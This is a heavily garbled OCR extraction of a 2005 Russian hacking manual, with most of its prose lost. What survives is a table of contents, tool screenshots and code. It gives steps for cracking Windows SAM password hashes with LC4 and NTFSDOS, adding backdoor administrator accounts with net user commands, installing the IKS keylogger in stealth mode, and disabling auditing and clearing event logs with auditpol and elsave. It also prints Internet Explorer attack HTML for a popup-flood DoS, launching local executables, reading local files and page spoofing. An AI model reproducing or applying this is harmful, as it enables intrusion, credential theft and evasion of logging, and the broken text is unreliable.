Академический Документы
Профессиональный Документы
Культура Документы
004.056.53(075.8)
32.973.202-0878-1+32.973.2-018.278-1
Alex Atsctoy.
: . . .: [, ] /
Alex Atsctoy. .: , 2005. 192 .: .
ISBN 5-93673-036-0.
CIP
? ,
, - .
: www.3st.ru
E-mail: post@triumph.ru
ISBN 5-93673-036-0
, 2005
, 2005
, 2005
1.
2. Windows ZOOO/Xf.
25
. "
37
4.
57
5. fyay^epofc Web
73
6.
83
7. XaKUHflCQ
99
8. Web~caumo&
115
9. AmaKU'PoS
143
.
Windows 2000/Xf
160
11.
176
191
1. .............................................................................................. 8
............................................... . .................................................. 9
- ? ................................................................................................... 10
............................................................................................... 13
................................................................................................ 16
....................................................................................................... 16
................................................................................. 17
............................................................................. 75
Web ........................................................................................................... 19
Web ............................................................................................................ 20
................................................................................................................ 21
............................................................................................. 21
................................................................ 22
- ....................................................................................................... 22
................................................................................................................. 23
................................................................................................................. 23
.&.................................................?
................................................................................. 38
NTFSDOS Pro ...................................................................................................... 39
SAM .................................................................................................................. 44
.................................................................................... 47
******** ............................................................................................. 50
......................................................................................... 51
............................................................................................. 52
......................................................................................................... 53
....................................................................................................... 53
................................................................................................
.. 56
4.
57
58
59
63
66
68
69
70
72
5. & Web
HTML
Web-
73
74
78
81
82
6.
83
83
85
88
89
90
91
96
97
7. ICQ
99
ICQ
IP- ICQ-
ICQ-
ICQ
ICQ-
100
101
102
103
104
106
111
112
113
8. We|?~C3UmO&
115
Web-
Web-
Web-
IIS 5
Web- Teleport Pro
HTML
Web
115
116
118
119
120
122
123
125
131
132
136
138
139
142
9. Ahl3KU "
143
DoS
!8
Smurf.
Nuke
Teardrop
Ping of Death
Land
DoS
144
145
145
147
148
149
151
752
154
154
755
155
756
159
TCP/IP
.
6
160
162
762
165
765
NetBus
168
169
173
175
176
PhoneSweep 4.4
PhoneSweep 4.4
PhoneSweep
177
178
179
180
782
185
186
186
190
1.
, - ,
, , , . , , . ,
( ).
!!!
, , .. , , 2 () .
.
,
:
log:
:
1:
2:
em: e-mail
.
,
! . 13.06.1999, ..
.
!!!
,
http://www.super-internet-provider.ru
, .
, - , , , , , , , . , , ,
Web- .
-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.
, , , ,
. , , , . ( !),
.
-
(-, !)
,
, .
, ,
-
,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,
.
, . , , , , , ,
, .
, , ,
. , - ,
, ,
, .
20-
- .
?
, , , , ,
, - , -
, ,
(, -
)
, -
10
. , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .
,
, .
, Windows ? ,
, - ? , , , ,
.
11
, ?
21 ( ).
:
:
, , ,
, ,
. , .
:
, .
. , , ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?
, - .
, , , , , ...
. , ,
, (, ,
) . , :
12
- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, . - , - 19- . ,
,
, , .
,
, , .
, , -, , .
, , , . - , , , . ,
. , ,
- , - .
.
, , , . , .
, , .
, ,
.. , .
, , . , -
13
,
, , .
, ,
,
,
. , , : - .
,
. ,
, , , , ,
[3].
, , , . ,
.
"
, , , , .
- - , .
- , , , . ,
, ,
.
14
, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 4,
, , , , Windows, , .
. IP-,
. -
. , - ,
, -,
- ,
.
, 4 -
, ,
.
15
- ,
- . -
, ,
. ,
DoS ,
IDS.
. , .
, - , , .
, ,
.
,
.
; , .
- ,
, , , , .
, , , . , [3] , . ,
, [3] !
[1]. , (
). ,
16
, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .
. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - ,
.
17
, , Teleport Pro.
, Web-
, .
, , HTML Web-
- ,
, HTTP .
, , , , ,
, , , ( 1 1 ).
, Web- - ,
, . , .
, ,
,
. .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
3 ,
, LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,
3 . Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
Revelation SnadBoy
(http://www.snadboy.com). , 18
***** - ,
, -
Revelation .
,
, , , ,
, .
.
-
?
, ,
- , - .
Welo
- . , Web-,
,
-.
, Web, Web-,
Web- ,
. Web- 5 .
,
. , Web-,
.
. , , 6 Death & Destruction Email Bomber -
. , . , , , 6
Brutus.
19
, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, .
- , IP- ICQ- ICQ,
, .
, .
Web
Web- , , , DoS, - .
, IIS 5 (Internet Information Server - ) Microsoft
.
Web- , Web-, HTML . 8 , , CGIScan
Brutus, IIS
. 9 ,
DoS.
Web- ,
,
Web-. , DoS
, - , .
Web , , CGI-. ,
, .
20
TCP/IP , ,
, , IP-,
, .
,
.
10 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
,
, , .
flepex&am
, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
.
- SpyNet, .
21
, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .
, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .
, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.
11~
- ,
, .. . Web- ,
(., ,
http://www.securitylab.ru). 8 IIS. CGIScan
, . , 22
- , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .
- , .
- ,
. 10
NetBUS, . , .
- ,
, , .
. - , ,
. , , -
- , ,
... , , .
-
, , , ,
. ,
,
( ), ,
? , , -
23
,
, ?
, - ?
, , ( ),
, , , -
.
,
.
. ,
, ,
, .
, ,
.
, ,
,
, .... , , - Windows 2000/XP.
24
2.
Windows /Xf
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .
.
.
.
, - ,
, ,
, , .. ,
- .
, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM
, , . SAM - , 3 .
, .
,
, , .
, -
, , . , , ,
.., , , ,
. , ,
-, (,
, ) ,
, , .
, , , , .
Windows NT 4 NTLM
(NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM, , LM (LAN Manager - ),
, Windows NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .
, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.
26
Windows 2000/XP
, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...
urn
,
, .
, , - , .. ,
. ,
, . ,
,
, , ,
.
Windows NT/2000/XP,
, , - .
, 4, ,
, .
,
, , , ,
27
, , .
,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.
Windows 2OOO/XP
Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , :
, ,
28
Windows 2000/XP
, /, .
SAM AD ,
LSA . , , , ..
, SRM.
, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.
SAM
, , , ,
. , , , SAM AD,
. SAM %%\5132\\5,
AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , ,
- ! .
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstacke.com) ,
.
LOphtCrack SAM, , , pwdump
(http://www.atstacke.com). Windows - pwdump SAM
, LOphtCrack,
- ,
LM - .
29
Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .
Windows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
. Windows 2000/XP SID, Windows 2000 SID.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL
30
Windows 2000/XP
, , (Explorer) Windows,
Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID 8 , .
, ,
SRM 8 ACL , , .
, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.
Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
31
ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .
Windows 2000/XP
, . , .
Windows 2000 , - ,
Windows 2000 Windows NT. , , .
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com*!.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1.
domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2
compl.domen2.forest, comp2.domen2.forest, ....
.
32
Windows 2000/XP
, - ,
:
.
(Universal group), , , .
(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOpghtCrack .
, , - - .
Windows 2000
Windows 2000
, . - ,
33
2 - 5830
, -, ,
. -, , , [7], , . -
, ,
- ,
. .
- ,
- , AD. - - ,
- -.
- ,
.
. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
34
Windows 2000/XP
-
TCP- 88 , Kerberos,
. -
LM NTLM, LOphtCrack
.
, - ,
. , ?
, , ,
.
, ,
.
,
. , , ,
.
,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP
Windows.
Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
35
-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
, - ,
, .
- , ..
.
Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS ,
Microsoft Press Windows 2000.
36
&
Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
,
.
, , ,
(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .
,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),
Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .
38
1515 fro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start Programs NTFSDOS Professional). (. 3.1).
wizard will help you install V/indows NT/200DvXP system files needed
NTFSDOS Professional to run from a MS-DOS diskette or hard disk
39
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows
NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
"Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create
an MS-DOS startup disk" option checked.
< Back
Next >
Cancel
. .2.
NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 661
MS-DOS Multilingual (Latin 1). code page 650
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 86
MS-DOS Slavic (Latin II). code page 852
< Back
Next >
Cancel
. ..
> Next ().
NTFSDOS Pro
(. 3.4).
Windows
NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 3.5).
40
<Bock
Cancel
. .4. Windows
target location is the directory from which you will run NTFSDOS Pro. It must be
ssiole from MS-DOS.
Specify the disk or directory from which you would like to run NTFSDOS professional. You may
select A: to specify a floppy disk.
<Back
41
<Bsck
Cancel
Cancel
Puc. 3.7.
(. 3.7) Next
() . Windows XP NTFSPRO.EXE
, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
42
(. 3.8)
NTFSDOS Professional.
necessary files hove been copied. You may now reboot to MS-DOS
begin using NTFSDOS Professional Edition.
43
5
SAM, SAM.
NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 3.9 LC4 Import ().
IB?!
Import | Senion
Help
. .9. LC4
, LC4
, . SAM :
> File * New Session ( * ). , . 3.9.
> Import Import From SAM File ( *
SAM). SAM.
> SAM, 1-3.
> (. 3.10) Session Begin Audit
( ) .
44
?l@stakeLC4 -(Unlilbdll
File
View
Import
Sestion
Help
.i u
_u
lALEX-3
IALEX-
(ALEX-
lALEX-3
lALEX-3
lALEX-3
[ALEX-3
Administrator
empty '
ASPNET
Guett
HelpAssittant
IUSH_ALEX-3
empty '
empty '
empty '
IWAM_ALEX-3
NewUzer
amply
" empty '
* \ ft \
' empty '
e.;
Od Oh Qm us
i as
CS
mporled 7 accounts
Adnuniitialoi
ASPNET
Guel
HelpAti.tlonl
IUSH.ALEX-3
IWAM.ALEX-3
NenUter
. 3.11. SAM !
, - 007 , , .
, , 5
Pentium 2 400 . 45
- , LC4
.
LC4 Auditing
Options For This Session ( ), . 3.12.
Dictionary Crack D
Enabled
Dictionary List [
The Dictionary Deck tests For passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack
El Enabled
|0
Characters to prepend
I Characters to append
El Enabled
D
|A-ZandO-9
Distributed
Ptrtli.
I Oil
The Brute Force Crack tests fa passwords that are made up of the characters specified
in the Character Set. It finds passwords such as "WeR3pll6s" a "vC569t12b". This
lest is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.
OK
Cancel
Puc. 3.12.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack (/ ),
, / ,
, .
Password???, .
46
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.
'
Windows , , . MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5.
, , *******
Revelation SnadBoy (http://www.snadboy.com).
, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - OfficePassword
.
47
OfficePassword 3.5
OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5
.
Word
password.doc, -
?
, Windows,
password.doc, (. 3.13).
- ,
OfficePassword 3.5
:
> OfficePassword (Start
Programs * OfficePassword). OfficePassword (. . 3.14).
Password
II
[ OK
Cancel
Puc. 3.13.
Word
I OfficePassword "DEMO"
File
Took
Option*
1-]
Help
Selecl document
You can also diag-and-drop files from Internet Explorer onto this
window.
> (c) 1998-2001 Vitas Ramanchauskas. LastBit Software <
http://lastbit.com
""" DEMO Version "
| Register to upgrade to a full-functional veision! |
Puc. 3.14.
OfficePassword
- , .
> , Select recovery
mode ( ), . 3.15.
Select lecoverv mode
Jocument path: C:\test\passwotddoc (Word)
Version
: Wotd 8.0+
ntemal version: 133
Word language : Russian (0419)
incryption type: Strong
Text size
: 537
Preview
Automatic
OflicePassword automatically selects most suitable recovery options. Recovery may take a
lot of time (up to several months in case ol a long password]. About 80% of all passwords
could be recovered within 48 hours. Use guaranteed recovery otherwise.
User-defined
Adjust settings to optimize search for specific case. (This option is for advanced useis only.)
Guaranteed recovery
Success is guaranteed! Important: please read the documentation. Additional fee may apply.
I Click here to learn
Cancel
Next
Puc. 3.15,
> Select recovery mode ( )
:
Automatic ( ), ,
Next (), ,
.
User-defined ( ),
. .
Guaranteed recovery ( ), , , ,
.
> Next
lOlficePasswoid 'DEMO*
Password found:
'007' (without quotes)
The password has been copied onto the clipboard
Would you like to open the document now?
Yes
No
Puc. 3.16. !
49
(). , ,
(. 3.16).
OfficePassword 3.5 , ,
. - , .
, - ,
.
, , 24-28
, . ,
, .
, , - ,
.
******
, - ,
, (, ), , ******.
, , , . - , , ,
. ,
.
,
-,
. ,
,
NetBus . . 3.17
Revelation Snad (http://www.snadboy.com) NetBus
NetBus.
50
* SnadBoy's Revelation
'Circled V Cursor
Drag to reveal password
About
Exit
I Copy to clipboard
007
Status
Revelation active.
i SWORD-2000
iMycq
Change Hoct
Always on top
Hide 'How to' instructions
How to
1) Left click and drag (while holding down the left mouse button) the 'circled V
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE - II the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE - Not an of the fields that the cursor passes over will have text that can be revealed. Check
the status light foi availability of text.
Bright green - text available (See length of text:' in Status area)
Blight red - no text available
Cancel
- , - , -
, , - .
: .
51
, 4.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.
&*
, , , , .
MS-DOS: NET USER < > <> /ADD,
, NET
LOCALGROUP < > < > /ADD, . . 3.18 .
r^JCommand Prompt
- NewUser 00 /add
|The command completed successfully.
C:\>net localgroup fldministrators NewUspr /add
I The command completed successfully.
Puc. 3.18.
NewUser
NewUser
, , .
,
,
.
52
- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.
- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 , .
Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS
Windows NT/2000/XP. , IKS , .
IKS .
Web- iks2k20d.exe , . 3.19.
53
D Standard Install | p Stealth Install | D Uninslall |
It's recommended that you use Standard Install if this is your first time in using IKS. Just
accept the defaults and dick on "Install Now" button. Or you can dick on 'Read readme M"
to get familiar with the concept of IKS first.
During a standard installation a program directory will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile
renaming (stealth features) will take place.
Install Directory
|C \Progrem Files\iks
You need to heva administrator rights on this system for it to install successfully.
rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the
"Unmstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.
Read readme.M
. 3.19. IKS
Install Now ( ) -
. IKS . ,
IKS , iks.sys,
. ,
dataview.exe, . 3.20.
Settings Help
Use Notepad
Translate to Text Only
Gear La a
Clear Binary Log Upon Exit
0 dear Text Log Upon Exit
I Browse,
Puc. 3.20.
54
Go! () , . . 3.20 ,
, .
, IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers,
( Regedt32 . 3.21).
Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi
Registry Edit Tree View Security Options Window
SGemuwa
SGpc
&I37DRIVER
CEJIAS
ICQ Groupware
COIISADMIN
IPMksl
CD ILDAP
QIMAP4D32
GDIMonitor
inetaccs
Cllnetln(o
Help
Inport
55
, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.
- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , , - ?
. .
56
4.
- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 , 50%
,
- , , .
, ,
,
. , ,- , , . ,
( ).
, - ( ).
,
. , - , , , .
.
, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
, [10],
(, ) , - , - privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .
. , Web-
, Web, .
, , ,
58
(, ).
, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .
. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
59
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
)0 j
| | j
.
| | |
:
" "
;
D
0
0 ()
Q
Q -
, / "
<1
|
OK
1 I
. 4.1.
- Word
(Delete) Windows ,
. . 4.2,
, Word,
, ,
.
^
1 ^3
I-QPGP
g Security
I ; Database
L
SJ
I
rf 3.5 (:)
& (:)
(D:)
: 10 ( 50
3PGP
I] Security
5|
50~$ .doc
|~WRL0002.tmp
_~WRU>004.tmp
|~WRL1120.tmp
~WRL19B2.tmp
|~WRL3531.tmp
||
Puc. 4.2. ,
, - ., .WBK, 60
, ~$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.
- Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmlttClndisk).
,
, , . , . ,
, . - , , .
( 100%) .
. 4.3 Clean Disk Security 5.01
(http://www.the-absolute.net/sware/
index.html#Clndisk), ,
( ).
Clean Disk Security 5.01
Erase
fully ( ).
, , - . 4.3. Clean Disk Security 5.01
(
61
FAT NTFS). , , .
Windows, Windows,
Temp ( , , )
. -,
, ,
(cookie).
, (. 4.3).
. 4.3, :
Simple () - 6 ,
. ; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . . ,
( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01
, , .
, [10]. -
, : (UPS);
. , ,
.
,
.
62
, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.
. , ,
NTFS.
, ,
, -
. , - - Web- .
, , .
.
, ,
.
&
, , .
. ,
.
63
, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
, , !!!
Web- ,
64
. HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 4.4, , Web-, - .
3l Analyze Your Internet Privacy - Microsoft Internet Explorer
^^^^"
^^^^~
BBSBBBgg
**- ^
a_
. 4.4. Web-
, ( )
Whols,
1,
.
, - , IP- . Web-
Web- , IP- -
...
65
3 - 5830
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 4.5).
Anonymizer.com -- Onlinu Privacy Sorvic
4- - - 1 | U [ ife-r ^ "
hup.//wwwanonymteBf.coin.
Anonymizer.com
(| AboutPrivacy'
FIND IT STO
spyCap
" '"
. 4.5. Web-
Go.
- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .
66
'"
.
,
D
Q
0 -
:
|www.anonymize| ; J8080
[...!
D -
-
:
:
:
1
1
1
. 4.6. -
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .
67
, , , ,
, , , .
, , , 3 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
IP- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, , , .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).
Windows, .
, .
,
68
, , explorer.exe,
Windows
Windows.
, EliteWrap, [11].
( Rootkit - ). ,
, .
.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].
, ,
, -
, .
, / .
Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
69
System
Logon
Object Access
Privilege Use
Process Tracking
Policy Change
Account Management
Directory Service Access
Account Logon
= No
= No
= No
= No
= Success and Failure
= No
= No
= No
= No
//ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).
Windows 2000/XP :
> (Start)
(Settings Control Panel).
File
Action
View
Help
I Sire
512...
(Control Panel)
(Administrative Tools).
(Event Viewer).
Event Viewer ( ) (. 4.7).
(Security Log);
.
Clear all Events ( ). , . 4.8,
.
No
Cancel
Puc. 4.8.
> (No), . .
,
- ! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, ,
Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\ComputerName -
-s , -
. , . elsave /? ,
.
, elsave.exe . - elsave.exe
Windows ( (Start), AT
MS-DOS). System, .
71
-
( , - ).
, , . , , ,
, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .
72
#
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
, , ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , , (, ).
, . ,
, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - ,
Web . -
1961 , Web 1992 .
, , -
. Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web, HTML (Hyper Text Markup Language -
).
, ,
, - HTML CGI HTTP.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , , ),
Web Web-.
HTML - Web,
Web,
, , , , , , , , . , HTML
, Web, , Internet Explorer (ffi) Netscape Navigator (NN).
74
Web
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.
, DoS , Web . , ,
Web,
, .
open ( ) ,
JavaScript MainPage.html
, HTML 8. 1.
8.1.
HTML Web-
<HTML>
< SCRIPT LANGUAGE* " JavaScript " >
generation () ;
function generation () {
var d=0;
while (true) {
a = new Date;
d = a.getMilliseconds( ) ;
window. open ("MainPage. html", d, "width=250, height =250") ;
</SCRIPT>
</HTML>
HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.
75
IE 5 IE 6
.
tlep
- . , 8.2
... (
).
8.2.
HTML Web-
<HTML>
<SCR1PT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>
HTML 8.2 IE 5
6 var p 8.2.
( [3], [10]). , ,
-
HTML .
[3] HTML,
<OBJECT> CLSID.
8.3. HTML, .
8.3.
HTML
<HTML>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE^': \windows\system32\calc.exe ' >
</OBJECT>
</HTML>
8.3 IE 6 ,
. 5.1.
76
Web
JQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D... [)11
. 5.1. HTML
C:\Windows\
system32\calc.exe, , .
Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.
8.4.
Web- _
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=Il></IFRAME>
II.navigate("file://:/Security.txt");
setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6 , . 5.2.
File
Edit
View
Favorite*
Tools
Help
QMd.-0-
C:\security.txt
. 5.2,
security.txt -
-
Web-.
,
,
, JavaScript . 5.2. Web-
.
Web-
NavigateComplete2, [3].
Web-caumo&
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
78
Web
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.
Web-, . Web , . 8.7 HTML, -.
8.7.
HTML
<HTML>
<HEAD>
<1>
Bubliki&Baranki
!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE=ntext/javascript">
function falsify() {
z=window.open("about:Internet-
Bubliki&Baranki
");
z.document.open();
z.document.write
